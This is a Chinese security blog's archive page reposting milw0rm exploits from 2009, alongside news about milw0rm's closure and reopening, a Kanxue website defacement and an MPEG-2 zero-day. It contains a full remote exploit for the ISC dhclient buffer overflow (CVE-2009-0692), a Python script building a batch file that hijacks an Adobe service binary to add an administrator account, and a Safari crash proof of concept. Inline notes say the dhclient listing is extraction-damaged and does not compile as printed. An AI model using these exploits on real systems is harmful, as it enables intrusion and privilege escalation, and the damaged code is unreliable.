分类 "网络安全" 的存档.

ISC DHCP dhclient < 3.1.2p1 远程缓冲区溢出漏洞

ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC
ISC DHCP是一款开源的DHCP服务实现。
ISC DHCP服务器不正确处理DHCP请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

/*
* cve-2009-0692.c
*
* ISC DHCP dhclient < 3.1.2p1 Remote Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
*
*   Stack-based buffer overflow in the script_write_params method in
*   client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before
*   4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to
*   execute arbitrary code via a crafted subnet-mask option.
*
* Usage:
*
*   $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet
*   $ sudo ./cve-2009-0692
*   [+] listening on eth0: ip and udp and src port 68 and dst port 67
*   [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920
*   [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920
*
*   $ gdb /sbin/dhclient
*   …
*   DHCPREQUEST on eth0 to 255.255.255.255 port 67
*   DHCPACK from 0.6.9.2
*   …
*   Program received signal SIGSEGV, Segmentation fault.
*   0x41414141 in ?? ()
*
* Notes:
*
*   Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3.  Feel free
*   to tweak for your target platform.  Depends on libdnet and libpcap.
*
*   READABLE_1 and READABLE_2 need to be readable addresses as we fix up the
*   stack during our overflow.  After a successful return from the vulnerable
*   script_write_params function, EIP will be set to JMP_TARGET.
*
*   Exclusively for use at DEFCON next week.  😉
*/

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <dnet.h>
#include <pcap.h>

/*
 * Target-specific values.  The three addresses are for the 32-bit dhclient
 * 3.1.2 build named in the file header ("Notes" above) and are written as
 * little-endian byte strings; JMP_TARGET is the 0x41414141 placeholder that
 * produces the SIGSEGV shown in the header rather than a real jump target.
 */
#define READABLE_1         "\xa8\xfc\x0b\x08" /* for es.client */
#define READABLE_2         "\xbc\x34\x0a\x08" /* for es.prefix */
#define JMP_TARGET         "\x41\x41\x41\x41"

#define BPF_FILTER         "ip and udp and src port 68 and dst port 67" /* DHCP client -> server traffic only */
#define PKT_BUFSIZ         1514  /* largest untagged Ethernet frame: 14-byte header + 1500-byte MTU */
#define DHCP_OP_REQUEST    1     /* BOOTP op field: BOOTREQUEST */
#define DHCP_OP_REPLY      2     /* BOOTP op field: BOOTREPLY */
#define DHCP_TYPE_REQUEST  3     /* option 53 value: DHCPREQUEST */
#define DHCP_TYPE_ACK      5     /* option 53 value: DHCPACK */
#define DHCP_OPT_REQIP     50    /* option code: requested IP address */
#define DHCP_OPT_MSGTYPE   53    /* option code: DHCP message type */
#define DHCP_OPT_END       255   /* option code: end of option list */
#define DHCP_CHADDR_LEN    16
#define SERVERNAME_LEN     64
#define BOOTFILE_LEN       128
#define DHCP_HDR_LEN       240   /* fixed header incl. the 4-byte magic cookie; equals sizeof(struct dhcp_hdr) */
#define DHCP_OPT_HDR_LEN   2     /* option code byte + length byte */

/* Non-GCC compilers: define __attribute__ away and pack via #pragma instead,
 * so the wire-format structs below keep their exact on-the-wire layout. */
#ifndef __GNUC__
# define __attribute__(x)
# pragma pack(1)
#endif

/*
 * Fixed-length DHCP/BOOTP header as laid out on the wire, followed by the
 * magic cookie.  sizeof == 4 + 4 + 4 + 16 + 16 + 64 + 128 + 4 == 240 ==
 * DHCP_HDR_LEN, so the option list starts DHCP_HDR_LEN bytes past `op`.
 * Multi-byte fields are left in wire (network) byte order; the code copies
 * them around raw and never byte-swaps them.
 */
struct dhcp_hdr {
    uint8_t op;                          /* DHCP_OP_REQUEST or DHCP_OP_REPLY */
    uint8_t hwtype;
    uint8_t hwlen;
    uint8_t hwopcount;
    uint32_t xid;                        /* transaction id; the reply reuses the client's */
    uint16_t secs;
    uint16_t flags;
    uint32_t ciaddr;
    uint32_t yiaddr;                     /* "your" address; the reply fills this from option 50 */
    uint32_t siaddr;
    uint32_t giaddr;
    uint8_t chaddr[DHCP_CHADDR_LEN];     /* client hardware address */
    uint8_t servername[SERVERNAME_LEN];
    uint8_t bootfile[BOOTFILE_LEN];
    uint32_t cookie;                     /* DHCP magic cookie preceding the options */
} __attribute__((__packed__));

/*
 * Type/length header of one DHCP option; `len` value bytes follow it.
 * The option walk in process() stops at DHCP_OPT_END without reading `len`.
 */
struct dhcp_opt {
    uint8_t opt;    /* option code, e.g. DHCP_OPT_MSGTYPE, DHCP_OPT_REQIP, DHCP_OPT_END */
    uint8_t len;    /* length of the value in bytes */
} __attribute__((__packed__));

#ifndef __GNUC__
# pragma pack()
#endif

/*
 * pcap callback.  For each captured DHCP REQUEST it builds a forged DHCPACK
 * whose subnet-mask option (option code 1) carries the overflow payload and
 * sends it through a raw Ethernet handle on the same interface.
 *
 * data   - the interface name; main() passes `dev` as the user argument of
 *          pcap_loop().
 * pkthdr - capture header; only caplen is consulted.
 * pkt    - the captured frame.  Header offsets are the fixed constants
 *          ETH_HDR_LEN / IP_HDR_LEN / UDP_HDR_LEN, so the code assumes an
 *          untagged Ethernet frame with an option-less IPv4 header; the IP
 *          header itself is never inspected.
 *
 * NOTE(review): this listing is extraction-damaged - every "->" is printed
 * as ">" and the binary "-" is missing from the three pointer-difference
 * expressions (each marked below).  As printed it does not compile.
 */
void
process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
    eth_t *raw;                   /* libdnet raw Ethernet handle, opened per packet */
    struct ip_hdr *ip_h;
    struct eth_hdr *eth_h;
    struct udp_hdr *udp_h;
    struct dhcp_hdr *dhcp_h;      /* points INTO the const capture buffer (see below) */
    struct dhcp_opt *dhcp_opt;
    char *dev = data, *ptr;
    char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];
    int opt_len, clen = pkthdr>caplen;           /* NOTE(review): reads pkthdr->caplen */
    uint8_t msg_type = 0, payload_len = 0;       /* payload_len is one byte: it becomes the option length */
    uint32_t yiaddr = 0;                         /* requested IP (option 50), copied raw in wire order */

    /* packet too short */
    /*
     * This guarantees only the fixed headers plus ONE option header.  The
     * option walk below copies an option's value before it checks that the
     * option fits in caplen, so a truncated capture can be read a few bytes
     * past caplen (still inside pcap's snaplen buffer, but past the frame).
     */
    if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {
        return;
    }

    /* Overlay the header structs on the frame.  pkt is const u_char *, so
     * these casts silently discard const; dhcp_h is written through later. */
    eth_h = (struct eth_hdr *) pkt;
    ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);
    udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);
    dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);
    dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);

    /* only care about REQUEST opcodes */
    if (dhcp_h>op != DHCP_OP_REQUEST) {                  /* NOTE(review): dhcp_h->op */
        return;
    }

    /* parse DHCP options */
    /*
     * Walk the TLV option list until DHCP_OPT_END, picking out the message
     * type (option 53) and the requested address (option 50); either one
     * with an unexpected length drops the packet.  Pad options (code 0,
     * which carry no length byte) are not special-cased and would be
     * misparsed as TLVs.
     */
    while (1) {
        if (dhcp_opt>opt == DHCP_OPT_MSGTYPE) {           /* NOTE(review): dhcp_opt->opt, and so on below */
            if (dhcp_opt>len != 1) {
                return;
            }
            memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt>len);
        }
        if (dhcp_opt>opt == DHCP_OPT_REQIP) {
            if (dhcp_opt>len != 4) {
                return;
            }
            memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt>len);
        }
        if (dhcp_opt>opt == DHCP_OPT_END) {
            break;
        }
        /* NOTE(review): "(char *) dhcp_opt - (char *) pkt", the offset of the
         * current option; stop if stepping past it would leave the capture.
         * The check runs AFTER the value above has already been copied. */
        if (((char *) dhcp_opt (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt>len > clen) {
            break;
        }
        dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt>len);
    }

    /* only care about REQUEST msg types */
    if (msg_type != DHCP_TYPE_REQUEST) {
        return;
    }

    /* xid is printed as stored (no byte swap); it is only a label.
     * NOTE(review): eth_h->eth_src and dhcp_h->xid in the original. */
    printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(&eth_h>eth_src), dhcp_h>xid);
    printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(&eth_h>eth_src), dhcp_h>xid);

    /* construct stack payload */
    /*
     * 68 bytes: 16 zero bytes, READABLE_1, READABLE_2, 8 zero bytes, a
     * little-endian 4, 28 zero bytes, then JMP_TARGET.  Per the file header
     * the two READABLE_* words keep script_write_params() from faulting
     * before it returns, and JMP_TARGET is what ends up in EIP; all offsets
     * are specific to the build named there.
     */
    memset(payload, 0, sizeof(payload));
    ptr = payload;
    memset(ptr, 0, 16);
    ptr += 16;
    memcpy(ptr, READABLE_1, 4);
    ptr += 4;
    memcpy(ptr, READABLE_2, 4);
    ptr += 4;
    memset(ptr, 0, 8);
    ptr += 8;
    memcpy(ptr, "\x04\x00\x00\x00", 4);
    ptr += 4;
    memset(ptr, 0, 28);
    ptr += 28;
    memcpy(ptr, JMP_TARGET, 4);
    ptr += 4;
    payload_len = ptr payload;                           /* NOTE(review): ptr - payload (== 68) */

    /* dhcp header */
    /* Reuse the client's own header as the reply: flip op to REPLY and set
     * yiaddr to the address it asked for.  This writes through dhcp_h, i.e.
     * into pcap's capture buffer, since const was cast away above. */
    dhcp_h>op = DHCP_OP_REPLY;                           /* NOTE(review): dhcp_h->op */
    memcpy(&dhcp_h>yiaddr, &yiaddr, 4);                  /* NOTE(review): &dhcp_h->yiaddr */

    /* normal dhcp options */
    /*
     * Ordinary DHCPACK options, written as raw wire bytes (code, len, value):
     *   53/1  message type 5 (DHCP_TYPE_ACK)
     *   54/4  server identifier 0.6.9.2
     *   51/4  lease time 0x00093a80 = 604800 s
     *    3/4  router 0.6.9.2
     *    6/4  DNS server 0.6.9.2
     */
    memset(options, 0, sizeof(options));
    ptr = options;
    memcpy(ptr, "\x35\x01\x05", 3);
    ptr += 3;
    memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6);
    ptr += 6;
    memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6);
    ptr += 6;
    memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6);
    ptr += 6;
    memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6);
    ptr += 6;

    /* malicious subnet mask option */
    /* Option 1 (subnet mask) with the 68-byte payload where dhclient expects
     * a 4-byte mask - this oversized option is the CVE-2009-0692 trigger. */
    memcpy(ptr, "\x01", 1);
    ptr += 1;
    memcpy(ptr, &payload_len, 1);
    ptr += 1;
    memcpy(ptr, payload, payload_len);
    ptr += payload_len;

    memcpy(ptr, "\xff", 1);                              /* DHCP_OPT_END */
    ptr += 1;
    opt_len = ptr options;                               /* NOTE(review): ptr - options */

    /* construct full packet payload */
    memset(pktbuf, 0, sizeof(pktbuf));
    ptr = pktbuf;

    /* Ethernet: broadcast destination, a fixed made-up source MAC. */
    eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP);
    ptr += ETH_HDR_LEN;

    /* IPv4: tos 0, total length, id 0x0692, DF, ttl 64, UDP, src 34145792
     * (0x02090600, which as stored on a little-endian host is 0.6.9.2 - the
     * "DHCPACK from" address in the file header), dst 255.255.255.255. */
    ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);
    ptr += IP_HDR_LEN;

    /* UDP 67 -> 68 (server -> client). */
    udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
    ptr += UDP_HDR_LEN;

    /* The (now modified) client header, then the option list built above. */
    memcpy(ptr, dhcp_h, DHCP_HDR_LEN);
    ptr += DHCP_HDR_LEN;

    memcpy(ptr, options, opt_len);
    ptr += opt_len;

    /* libdnet computes the IP header checksum and the UDP checksum in place. */
    ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);

    /* fire off malicious response */
    /* A fresh raw handle is opened for every packet and a failure calls
     * exit(1) from inside the pcap callback, tearing down the whole capture;
     * eth_send()'s return value is not checked. */
    raw = eth_open(dev);
    if (!raw) {
        fprintf(stderr, "[-] error opening raw socket on %s\n", dev);
        exit(1);
    }
    eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
    eth_close(raw);
}

/*
 * Print the command-line synopsis to stderr and terminate the program.
 *
 * argv - the program's argument vector; argv[0] supplies the program name.
 * Never returns: exits with status 1.
 */
void
usage(char **argv)
{
    const char *prog = argv[0];

    (void) fprintf(stderr, "usage: %s [-i interface]\n", prog);
    exit(1);
}

/*
 * Entry point: choose an interface (-i or the libpcap default), open it in
 * promiscuous mode, install BPF_FILTER so only client -> server DHCP traffic
 * is delivered, and hand exactly one matching packet to process().
 *
 * Returns 0 after that single packet; every setup failure exits with 1.
 *
 * NOTE(review): this block is extraction-damaged - the "-1" sentinels that
 * getopt() and pcap_compile() return are printed as "1" (marked below).
 */
int
main(int argc, char **argv)
{
    int ch, ret;
    char *dev = NULL;                     /* interface name; NULL until chosen */
    char errbuf[PCAP_ERRBUF_SIZE];        /* libpcap error text */
    struct bpf_program bfp;               /* compiled filter; never pcap_freecode()'d */
    pcap_t *ph;                           /* capture handle; never pcap_close()'d */
    
    opterr = 0;                           /* silence getopt's own messages; usage() reports instead */

    while ((ch = getopt(argc, argv, "i:")) != 1) {   /* NOTE(review): != -1 in the original */
        switch (ch) {
        case 'i':
            dev = optarg;
            break;
        default:
            usage(argv);                  /* does not return */
        }
    }

    if (!dev) {
        /* pcap_lookupdev() is deprecated in current libpcap in favour of
         * pcap_findalldevs(); it is only used when -i was not given. */
        dev = pcap_lookupdev(errbuf);
        if (!dev) {
            fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf);
            exit(1);
        }
    }

    /* snaplen PKT_BUFSIZ, promiscuous mode on, 1 ms read timeout */
    ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);
    if (!ph) {
        fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf);
        exit(1);
    }

    /* optimize = 1, netmask 0 (the filter has no broadcast test, so 0 is fine) */
    ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);
    if (ret == 1) {                       /* NOTE(review): == -1 in the original */
        fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph));
        exit(1);
    }

    /* BUG: pcap_setfilter()'s return value is discarded, so the check below
     * re-tests the pcap_compile() result and a setfilter failure is never
     * reported.  Should read `ret = pcap_setfilter(ph, &bfp);`. */
    pcap_setfilter(ph, &bfp);
    if (ret == 1) {                       /* NOTE(review): == -1 in the original */
        fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph));
        exit(1);
    }

    printf("[+] listening on %s: %s\n", dev, BPF_FILTER);

    /* cnt == 1: dispatch a single matching packet to process(), then return. */
    pcap_loop(ph, 1, process, dev);

    return 0;
}

// milw0rm.com [2009-07-27]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/129

Adobe相关服务(getPlus_HelperSvc.exe)本地提权漏洞

描述:
Adobe下载器(downloader)用于为Adobe应用程序下载更新
在Acrobat Reader9.x下测试
该可执行文件安装时被赋予了系统内置用户(Builtin Users)“完全控制”权限,任何用户都可以替换该文件来达到自己的目的。在系统重启后它将以"SYSTEM"权限运行。
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <————– [!!!]
                                           NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.

昨天Milw0rm上刚刚给出了Python的利用代码,内容如下:

#!/usr/bin/env python
##################################################################################
#
# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
# Coded By: Dr_IDE
# Discovered by: Nine:Situations:Group
# Tested On: Windows XP SP2, Requires NOS Package Installed
# Usage: python Dr_IDE-Adobe_912.py
#
##################################################################################
#
# Reviewer summary: as written, this script only WRITES a Windows batch file
# (Dr_IDE-Adobe.bat) into the current working directory; both lines that would
# run it are commented out at the bottom.  The batch file relies on the weak
# ACL on the getPlus helper service binary (BUILTIN\Users:F in the advisory
# above): it backs the binary up, copies cmd.exe alongside it, then invokes the
# service binary with "/C net user ..." arguments.  The path it uses
# (C:\Program Files\NOS\bin) is the English-locale install path, whereas the
# advisory output above shows C:\Programmi\NOS\bin.
# Mitigation: restrict write access on the service binary and its directory to
# Administrators/SYSTEM; a service binary writable by Users is the condition to
# audit for.

import os, subprocess   # only used by the commented-out execution lines below

#
# Should probably have a try block around this as not every install
# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
# play around with it.
#
# This is a super lame way to do this but it makes it more educational.
#
# The batch file is assembled line by line into one string; "\n" separates the
# batch commands and "\\" yields a single backslash in the Windows paths.
evil =  "echo *************************************************************\n"
evil += "echo *\n"
evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
evil += "echo * Coded By: Dr_IDE\n"
evil += "echo * Discovered By: Nine:Situations:Group\n"
evil += "echo * Tested On: Windows XP SP2\n"
evil += "echo *\n"
evil += "echo *************************************************************\n"
evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
evil += "cd C:\\Program Files\\NOS\\bin\n"
evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
evil += "exit"

# Write the batch file to a relative path (the current working directory, not
# the script's own directory).  No error handling; the file is never removed.
f1 = open('Dr_IDE-Adobe.bat','w');
f1.write(evil);
f1.close();

# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

# Silent Way – This should be more stealthy
#retval = subprocess.call("Dr_IDE-Adobe.bat");

# Louder Way – On some systems this will probably open a DOS window
#retval = os.system("Dr_IDE-Adobe.bat");

# milw0rm.com [2009-07-27]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/130

不知该说什么好–Milw0rm今天恢复开放

      昨天Milw0rm站长str0ke刚在首页宣布闭站,闹得满城风雨,众人正在叹息时,孰料今天突然恢复访问,重新接受投稿,并且是在没有任何通告的情况下。str0ke是想娱乐我们一下,说关就关说开就开?深度无语。
      以下是某牛人发现的Milw0rm站长在Twitter上发布的消息:

      milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there

      顺便把Milw0rm数据库的下载地址放出来:
      点击下载Milw0rm exp数据库

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/145

国外著名安全漏洞公布站点milw0rm关闭

      又是一则安全网站的新闻,只是这则新闻要猛的多,安全界最大的0day站点Milw0rm.com今天宣布关闭,站长str0ke曾在首页公告如下:

      Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
      Be safe, /str0ke

      现在网站已经不能打开。
      来个发布公告的首页截图:

Milw0rm宣布关闭首页截图

Milw0rm宣布关闭首页截图

      据说可能跟前段时间在 milw0rm 上公布的 Lxadmin(现在的 kloxo) 的 exp 有关,当时那个 exp 使很多站被黑,数据被清空,最后导致 Lxadmin 的作者 Ligesh 自杀。

      本博的"网络安全"分类下很多安全代码都是源自Milw0rm,因为它是业内最及时、最权威的安全漏洞发布站点;前一段时间它还黑了国外另一著名商业安全站点astalavista.com;可惜不久自己却关张大吉。
      相关链接:
      Techie hangs himself in HSR Layout
      Webhost hack wipes out data for 100,000 sites

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/147

著名技术团体看雪学院今日被黑

      今天上午听说看雪出了问题,10:00上去一看,看雪的首页被临时替换成如下页面:

2009.7.8 10:00看雪首页

2009.7.8 10:00看雪首页

      在不到一个小时的时间内,看雪首页恢复。
      下午14:30左右看雪首页再次临时调整,显示正在迁移数据:

2009.7.8 14:30看雪首页

2009.7.8 14:30看雪首页

      但内部栏目如"资源下载"、"专业论坛"等仍能正常打开。
      不知这次事件是何许人物所为,上午看雪服务器根目录下曾有hacker.txt文件,但忘记截图,现已被删除。
      根据网站服务器IP查询其服务器上另有一个技术论坛:中国飘云阁初学者破解组织,此论坛目前运行正常。此论坛的简介是:
      飘云阁是由中国破解组织成员飘云等电脑爱好者共同发起成立的中国破解初学者组织,成立于2004年12月01日,旨在带领广大破解爱好者踏入密界大门,共同研究讨论软件解密技术,增强国产软件加密水平并使民族软件发扬光大。
      同服务器论坛未受到影响,证明服务器权限未被全部攻下,而下午看雪却在迁移网站数据,着实费解。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/148

网络惊现微软MPEG-2视频0day漏洞 大规模网络攻击爆发

      【赛迪网-IT技术报道】北京时间2009年7月5日中午12时消息,一起针对微软MPEG-2视频解析模块0day漏洞的大规模网络攻击已经爆发。截至5日中午12点,红星美凯龙官方网站、中视音像、中国电子科技集团公司第二研究所、齐鲁石化医院集团、中国皮具网、中国煤炭网、北京啄木鸟婚纱摄影集团、天津市第一中心医院、云南地产门户网、铁道兵网等967个网站的7740个网址已被黑客植入了相应的攻击代码,其中包括了大量的色情网站。

      据安全专家介绍,从7月4日中午12点以后,一种相同类型的网络攻击开始大量增加,到7月5日凌晨7点突然呈爆发态势。经专家验证,黑客利用了微软Windows操作系统 BDA Tuning Model MPEG2 Tune Request视频组件的一个0Day漏洞。

      当用户点击相应“挂马网页”时,恶意代码就会自动触发以上MPEG2视频组件的msvidctl.dll模块,相应地IE等浏览器会表现为卡死一小会儿,随后,电脑就会自动下载和运行一系列黑客预先设置好的木马程序,期间恶意代码会强制关闭大部分安全软件、劫持IE首页、弹出广告页面等各种现象。

      据介绍,该漏洞与今年5月下旬的微软“DirectShow视频开发包”0day漏洞相似,都是通过浏览器来触发的漏洞。但不同的是,这个MPEG-2 0Day漏洞要容易利用得多,而且黑客不再需要网民运行任何恶意视频文件就能使其电脑变为任由黑客摆布的“肉鸡”。这种攻击方式更为隐蔽,普通用户更难防范,因而会更容易受到木马产业链等不法分子的青睐。另外,从目前测试的结果来看,由于VISTA、Windows2008以及WIN7使用了SAFESEH/GSCOOKIE技术,该0Day漏洞主要影响的是用户量最大的Windows XP系统。

      目前微软官方尚未发布补丁,0point在此提醒广大网友开启杀毒软件、防火墙并及时更新病毒库,尽量避免访问不良网站。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/150

Apple Safari 4.x JavaScript重载拒绝服务漏洞

___________________________________________________________________________________

Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________

Author   : Marcell 'SkyOut' Dietl, Achim Hoffmann
Email    : mail [at] marcell-dietl [dot] de
Vendor   : http://www.apple.com/
Product  : http://www.apple.com/safari/
Found    : 12.06.2009
Released : 01.07.2009

Tested on:
– Safari 4.0 at Windows XP SP3
– Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE

1) Create a HTML file with the following content:

+———-
| <html>
| <body>
| <script src="empty.js"></script>
| <script>
| try { crashSafari(); } catch(e) {
| setTimeout("location.reload();",42);
| prompt('apple culpa? comment:'); }
| </script>
| </body>
| </html>
+———-

2) Create an empty file called "empty.js" in the same directory.

3) Put both files into the WWW directory of your server.

4) Access the HTML file with your browser.
   – A popup will appear: Close it.
   – A popup will appear: Close it.
   – Crash.

5) On Windows:

+———-
| AppName: safari.exe      AppVer: 4.530.17.0      ModName: webkit.dll
| ModVer: 4.530.17.0       Offset: 00305f55
+———-

5) On Mac OS X:

+———-
| Process:         Safari [298]
| Path:            /Applications/Safari.app/Contents/MacOS/Safari
| Identifier:      com.apple.Safari
| Version:         4.0.1 (5530.18)
| Build Info:      WebBrowser-55301800~1
| Code Type:       X86 (Native)
| Parent Process:  launchd [163]
|
| Date/Time:       2009-07-01 00:58:48.144 +0200
| OS Version:      Mac OS X 10.5.7 (9J61)
| Report Version:  6
|
| Exception Type:  EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
|   eax: 0x00000002  ebx: 0x900bac11  ecx: 0x00625eec  edx: 0x00000000
|   edi: 0x00625ec8  esi: 0x00000002  ebp: 0xbfffe778  esp: 0xbfffe5e0
|    ss: 0x0000001f  efl: 0x00010217  eip: 0x900bac74   cs: 0x00000017
|    ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
|   cr2: 0x00000002
+———-
___________________________________________________________________________________
Advisory  : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php

Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html

Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006

# milw0rm.com [2009-07-02]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/154